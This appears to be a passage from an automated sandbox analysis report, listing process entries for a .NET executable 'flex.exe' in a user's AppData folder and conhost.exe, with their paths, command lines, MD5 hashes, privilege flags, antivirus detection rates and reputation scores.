                  Path:C:\Users\user\AppData\Roaming\flex\flex.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\AppData\Roaming\flex\flex.exe"
                  Imagebase:0x2f0000
                  File size:108664 bytes
                  MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:.Net C# or VB.NET
                  Antivirus matches:
                  • Detection: 0%, Metadefender, Browse
                  • Detection: 0%, ReversingLabs
                  Reputation:moderate

                  Target ID:15
                  Start time:13:30:27
                  Start date:08/08/2022
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff7d9660000
                  File size:875008 bytes
                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Target ID:16
                  Start time:13:30:35
                  Start date:08/08/2022
                  Path:C:\Users\user\AppData\Roaming\flex\flex.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\AppData\Roaming\flex\flex.exe"
                  Imagebase:0x2c0000
                  File size:108664 bytes
                  MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:.Net C# or VB.NET
                  Reputation:moderate

                  Target ID:17
                  Start time:13:30:35
                  Start date:08/08/2022
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff7d9660000
                  File size:875008 bytes
                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high

                  No disassembly